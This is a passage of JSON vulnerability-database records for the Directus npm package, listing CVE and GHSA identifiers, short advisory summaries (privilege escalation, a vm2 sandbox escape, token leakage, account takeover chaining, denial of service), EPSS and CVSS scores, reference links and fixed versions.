11.17.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35442","reference_id":"","reference_type":"","scores":[{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.04832","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.04829","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35442"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35442","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35442"},{"reference_url":"https://github.com/advisories/GHSA-38hg-ww64-rrwc","reference_id":"GHSA-38hg-ww64-rrwc","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-38hg-ww64-rrwc"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-38hg-ww64-rrwc","reference_id":"GHSA-38hg-ww64-rrwc","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-07T13:30:05Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-38hg-ww64-rrwc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373752?format=json","purl":"pkg:npm/directus@11.17.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.17.0"}],"aliases":["CVE-2026-35442","GHSA-38hg-ww64-rrwc"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ga3s-595f-2keq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/124112?format=json","vulnerability_id":"VCID-gf4m-ad8j-7bbn","summary":"Directus is a real-time API and App dashboard for managing SQL database content. Prior to version 11.2.0, when sharing an item, a typical user can specify an arbitrary role. It allows the user to use a higher-privileged role to see fields that otherwise the user should not be able to see. Instances that are impacted are those that use the share feature and have specific roles hierarchy and fields that are not visible for certain roles. Version 11.2.0 contains a patch the issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-24353","reference_id":"","reference_type":"","scores":[{"value":"0.00347","scoring_system":"epss","scoring_elements":"0.57651","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00347","scoring_system":"epss","scoring_elements":"0.57767","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-24353"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-24353","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-24353"},{"reference_url":"https://github.com/directus/directus/pull/23716","reference_id":"23716","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-23T18:52:42Z/"}],"url":"https://github.com/directus/directus/pull/23716"},{"reference_url":"https://github.com/directus/directus/commit/e288a43a79613dada905da683f4919c6965ac804","reference_id":"e288a43a79613dada905da683f4919c6965ac804","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-23T18:52:42Z/"}],"url":"https://github.com/directus/directus/commit/e288a43a79613dada905da683f4919c6965ac804"},{"reference_url":"https://github.com/advisories/GHSA-pmf4-v838-29hg","reference_id":"GHSA-pmf4-v838-29hg","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-pmf4-v838-29hg"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-pmf4-v838-29hg","reference_id":"GHSA-pmf4-v838-29hg","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-23T18:52:42Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-pmf4-v838-29hg"},{"reference_url":"https://github.com/directus/directus/releases/tag/v11.2.0","reference_id":"v11.2.0","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-23T18:52:42Z/"}],"url":"https://github.com/directus/directus/releases/tag/v11.2.0"},{"reference_url":"https://www.youtube.com/watch?v=DbV4IxbWzN4","reference_id":"watch?v=DbV4IxbWzN4","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-23T18:52:42Z/"}],"url":"https://www.youtube.com/watch?v=DbV4IxbWzN4"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/376928?format=json","purl":"pkg:npm/directus@11.2.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-32e6-c1bv-efea"},{"vulnerability":"VCID-3u2p-nh39-5qag"},{"vulnerability":"VCID-45yr-y58u-aqb8"},{"vulnerability":"VCID-4z1u-rtza-83bj"},{"vulnerability":"VCID-79ch-vtkp-q3cd"},{"vulnerability":"VCID-8q3p-rrv2-jba5"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-9r91-qgfa-x7ak"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-c4eu-udp3-uuen"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-dcw5-6ct3-b3ev"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-ghbw-eqaz-jqhs"},{"vulnerability":"VCID-jtg3-4cp8-8fe6"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-rren-vtar-23fm"},{"vulnerability":"VCID-snux-8b2e-9kd6"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.2.0"}],"aliases":["CVE-2025-24353","GHSA-pmf4-v838-29hg"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gf4m-ad8j-7bbn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/360871?format=json","vulnerability_id":"VCID-jvtg-cnnb-7ubg","summary":"Directus affected by VM2 sandbox escape vulnerability\n### Impact\nIn vm2 for versions up to 3.9.19, Promise handler sanitization can be bypassed, allowing attackers to escape the sandbox and run arbitrary code. Within Directus this applies to the \"Run Script\" operation in flows being able to escape the sandbox running code in the main nodejs context.\n\n### Patches\nPatched in v10.6.0 by replacing `vm2` with `isolated-vm`\n\n### Workarounds\nNone\n\n### References\nhttps://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5","references":[{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/284156426fa94f688e8d65a7a4f34f9e6705f058","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus/commit/284156426fa94f688e8d65a7a4f34f9e6705f058"},{"reference_url":"https://github.com/directus/directus/pull/19332","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus/pull/19332"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-22rr-f3p8-5gf8","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus/security/advisories/GHSA-22rr-f3p8-5gf8"},{"reference_url":"https://github.com/advisories/GHSA-22rr-f3p8-5gf8","reference_id":"GHSA-22rr-f3p8-5gf8","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-22rr-f3p8-5gf8"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5","reference_id":"GHSA-cchq-frgv-rjh5","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/32458?format=json","purl":"pkg:npm/directus@10.6.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-32e6-c1bv-efea"},{"vulnerability":"VCID-45yr-y58u-aqb8"},{"vulnerability":"VCID-4z1u-rtza-83bj"},{"vulnerability":"VCID-54ja-4vrx-tbgm"},{"vulnerability":"VCID-79ch-vtkp-q3cd"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-9r91-qgfa-x7ak"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-c4eu-udp3-uuen"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-dcw5-6ct3-b3ev"},{"vulnerability":"VCID-eyv5-91cq-pyf9"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-gf4m-ad8j-7bbn"},{"vulnerability":"VCID-jy2x-jbbb-zua5"},{"vulnerability":"VCID-nupg-ae85-dqaw"},{"vulnerability":"VCID-pvfa-xp3e-8kg2"},{"vulnerability":"VCID-qeh1-cm33-93g1"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-qrf3-cz1h-8kau"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-rren-vtar-23fm"},{"vulnerability":"VCID-s39d-aw92-hydh"},{"vulnerability":"VCID-snux-8b2e-9kd6"},{"vulnerability":"VCID-t1by-h5au-rqbu"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u4er-eddz-g7aq"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ua8h-tmak-hufd"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v2je-s9mk-e3h1"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.6.0"}],"aliases":["GHSA-22rr-f3p8-5gf8","GMS-2023-2358"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jvtg-cnnb-7ubg"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/39732?format=json","vulnerability_id":"VCID-jy2x-jbbb-zua5","summary":"Directus is a real-time API and App dashboard for managing SQL database content. When reaching the /files page, a JWT is passed via GET request. Inclusion of session tokens in URLs poses a security risk as URLs are often logged in various places (e.g., web server logs, browser history). Attackers gaining access to these logs may hijack active user sessions, leading to unauthorized access to sensitive information or actions on behalf of the user. This issue has been addressed in version 10.10.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-28238","reference_id":"","reference_type":"","scores":[{"value":"0.0009","scoring_system":"epss","scoring_elements":"0.25775","published_at":"2026-06-12T12:55:00Z"},{"value":"0.0009","scoring_system":"epss","scoring_elements":"0.25577","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-28238"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-28238","reference_id":"CVE-2024-28238","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-28238"},{"reference_url":"https://github.com/advisories/GHSA-2ccr-g2rv-h677","reference_id":"GHSA-2ccr-g2rv-h677","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2ccr-g2rv-h677"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-2ccr-g2rv-h677","reference_id":"GHSA-2ccr-g2rv-h677","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-02T19:50:33Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-2ccr-g2rv-h677"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/29718?format=json","purl":"pkg:npm/directus@10.10.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pt9-wpk9-tfhj"},{"vulnerability":"VCID-32e6-c1bv-efea"},{"vulnerability":"VCID-3u2p-nh39-5qag"},{"vulnerability":"VCID-45yr-y58u-aqb8"},{"vulnerability":"VCID-4z1u-rtza-83bj"},{"vulnerability":"VCID-54ja-4vrx-tbgm"},{"vulnerability":"VCID-79ch-vtkp-q3cd"},{"vulnerability":"VCID-8q3p-rrv2-jba5"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-9r91-qgfa-x7ak"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-c4eu-udp3-uuen"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-dcw5-6ct3-b3ev"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-gf4m-ad8j-7bbn"},{"vulnerability":"VCID-jtg3-4cp8-8fe6"},{"vulnerability":"VCID-pvfa-xp3e-8kg2"},{"vulnerability":"VCID-qeh1-cm33-93g1"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-qrf3-cz1h-8kau"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-rren-vtar-23fm"},{"vulnerability":"VCID-s39d-aw92-hydh"},{"vulnerability":"VCID-snux-8b2e-9kd6"},{"vulnerability":"VCID-t1by-h5au-rqbu"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ua8h-tmak-hufd"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.10.0"}],"aliases":["CVE-2024-28238","GHSA-2ccr-g2rv-h677"],"risk_score":1.4,"exploitability":"0.5","weighted_severity":"2.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jy2x-jbbb-zua5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50303?format=json","vulnerability_id":"VCID-pvfa-xp3e-8kg2","summary":"Directus v10.13.0 allows an authenticated external attacker to modify presets created by the same user to assign them to another user. This is possible because the application only validates the user parameter in the 'POST /presets' request but not in the PATCH request. When chained with CVE-2024-6533, it could result in account takeover.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-6534","reference_id":"","reference_type":"","scores":[{"value":"0.00058","scoring_system":"epss","scoring_elements":"0.18519","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00058","scoring_system":"epss","scoring_elements":"0.18356","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-6534"},{"reference_url":"https://directus.io","reference_id":"","reference_type":"","scores":[{"value":"4.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://directus.io"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"4.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://fluidattacks.com/advisories/capaldi","reference_id":"capaldi","reference_type":"","scores":[{"value":"4.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N"},{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-15T14:09:09Z/"}],"url":"https://fluidattacks.com/advisories/capaldi"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-6534","reference_id":"CVE-2024-6534","reference_type":"","scores":[{"value":"4.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-6534"},{"reference_url":"https://directus.io/","reference_id":"directus.io","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-15T14:09:09Z/"}],"url":"https://directus.io/"},{"reference_url":"https://github.com/advisories/GHSA-3fff-gqw3-vj86","reference_id":"GHSA-3fff-gqw3-vj86","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3fff-gqw3-vj86"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-3fff-gqw3-vj86","reference_id":"GHSA-3fff-gqw3-vj86","reference_type":"","scores":[{"value":"4.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus/security/advisories/GHSA-3fff-gqw3-vj86"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/33133?format=json","purl":"pkg:npm/directus@10.13.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-32e6-c1bv-efea"},{"vulnerability":"VCID-3u2p-nh39-5qag"},{"vulnerability":"VCID-45yr-y58u-aqb8"},{"vulnerability":"VCID-4z1u-rtza-83bj"},{"vulnerability":"VCID-54ja-4vrx-tbgm"},{"vulnerability":"VCID-79ch-vtkp-q3cd"},{"vulnerability":"VCID-8q3p-rrv2-jba5"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-9r91-qgfa-x7ak"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-c4eu-udp3-uuen"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-dcw5-6ct3-b3ev"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-gf4m-ad8j-7bbn"},{"vulnerability":"VCID-jtg3-4cp8-8fe6"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-qrf3-cz1h-8kau"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-rren-vtar-23fm"},{"vulnerability":"VCID-snux-8b2e-9kd6"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.13.2"}],"aliases":["CVE-2024-6534","GHSA-3fff-gqw3-vj86"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-pvfa-xp3e-8kg2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/41764?format=json","vulnerability_id":"VCID-qeh1-cm33-93g1","summary":"Directus is a real-time API and App dashboard for managing SQL database content. Prior to 10.11.2, providing a non-numeric length value to the random string generation utility will create a memory issue breaking the capability to generate random strings platform wide. This creates a denial of service situation where logged in sessions can no longer be refreshed as sessions depend on the capability to generate a random session ID. This vulnerability is fixed in 10.11.2.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-36128","reference_id":"","reference_type":"","scores":[{"value":"0.00353","scoring_system":"epss","scoring_elements":"0.58141","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00353","scoring_system":"epss","scoring_elements":"0.58028","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-36128"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/7d2a1392f43613094de700062aba168a9400dd3b","reference_id":"7d2a1392f43613094de700062aba168a9400dd3b","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-06-03T15:30:27Z/"}],"url":"https://github.com/directus/directus/commit/7d2a1392f43613094de700062aba168a9400dd3b"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-36128","reference_id":"CVE-2024-36128","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-36128"},{"reference_url":"https://github.com/advisories/GHSA-632p-p495-25m5","reference_id":"GHSA-632p-p495-25m5","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-632p-p495-25m5"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-632p-p495-25m5","reference_id":"GHSA-632p-p495-25m5","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_e